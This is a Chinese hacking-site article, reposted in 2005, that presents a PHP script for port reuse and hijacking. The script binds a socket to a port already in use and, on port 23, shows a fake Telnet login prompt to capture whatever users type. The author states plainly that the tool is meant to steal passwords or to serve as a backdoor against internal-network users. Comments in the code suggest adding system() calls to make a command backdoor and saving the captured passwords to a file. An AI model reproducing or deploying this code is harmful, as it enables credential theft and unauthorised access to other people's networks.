| 网站首页 | 硬件维修 | 应用学院 | 网络组建 | 网站制作 | 菜鸟黑客 | 编程之道 | 数码大全 | 娱乐休闲 | 软件下载 | 在线视频 | 请您留言 | 技术论坛 | 
专 题 栏 目
最 新 热 门
最 新 推 荐
相 关 文 章
  • 网络安全基础 教你怎样关闭网…

  • 用端口截听实现隐藏嗅探与攻…

  • 黑客扫描特征及易受攻击的端…

  • 对Windows操作系统如何实现D…

  • 攻防技术——动态IP地址的捕…

  • 网络世界的“后门”—讲述特…

  • 黑客如何实现网络过载攻击完…

  • 用windows 2000的IP安全策略…

  • 净化网络 让不良内容远离80端…

  • 解析cookie欺骗实现过程及具…

  • Q
    您现在的位置: 我是IT人 >> 菜鸟黑客 >> 黑客攻防 >> 文章正文
    PHP下实现端口复用/劫持         
    PHP下实现端口复用/劫持
    作者:网络 文章来源:转自黑客基地 点击数: 更新时间:2005-8-12
    [ 字体:缩小 正常 放大 | 双击自动滚屏 ]
    请选择合适的字体颜色:

    作者:Darkness

    经常看到有朋友问端口复用,我花了一个晚上写了一点代码
    本来想做成嗅叹转发的,无奈单线程的东西很局限,而且始终只能得到头行数据。我想要做成那样的,对于高手来说,不是困难的事。
    如果你不懂如何配置,请参照我以前的文章《PHP-SOCKETS初步接触》。WIN下只要有GUEST权限即可用,而且通过配合
    〈WINDOWS下装多个PHP〉  这篇文章,GUEST可以单独安装支持PHPSOCKETS的PHP。

    假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。
    这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
    最后欢迎加MSN:CQXY[AT]21CN。NET赐教。
    #!/usr/bin/php -q
    #c0dz by Darkness[BST]
    #Team:www.bugkidz.org
    #E-mail:cqxy[at]21cn.net
    <?php
    if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
    {
        echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21\r\n";
        echo "c0dz By Darkness[BST]";
        exit;
    }
    error_reporting(E_ALL);

    set_time_limit(0);

    ob_implicit_flush();

    $host = $argv[1];
    $port = $argv[2];
    if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
       echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
    } /*建立SOCKET*/
    socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/
    if (($ret = socket_bind($sock, $host, $port)) < 0) {
       echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
    }/*绑定端口*/

    if (($ret = socket_listen($sock, 5)) < 0) {
       echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
    }  /*开始监听*/

               
    while(true) {
     
       if (($sniffer = socket_accept($sock)) < 0) {
           echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "\n";
           break;
       }
    if ($port == 23)
        {
        $txt = "Welcome to the Telnet Server\r\n";
        $txt .="User:\r\n";
               socket_write($sniffer, $txt, strlen($txt));
        } /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/

       while(true) {
        
             if(($buf = @socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
           {
                
            break;
               
           }
        
           if (!$buf = trim($buf)) {
               continue;
           }
          

           if ($buf == '!quit') {
               break;
           }
           if ($buf == '!shutdown') {
               socket_close($sniffer);
               break 2;        /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
           }
          
           $sniff_data = "$buf\r\n";
          
           /* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
           echo $sniff_data;
           /*输出字符串,这里可以加进文件处理,保存密码什么的*/
       }
       socket_close($sniffer);
        
       
    }
    socket_close($resock);
    socket_close($sock);
    ?>

    文章录入:小秦    责任编辑:小秦 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    | 设为首页 | 加入收藏 | 联系站长 | 关于我们 | 友情链接 | 版权申明 |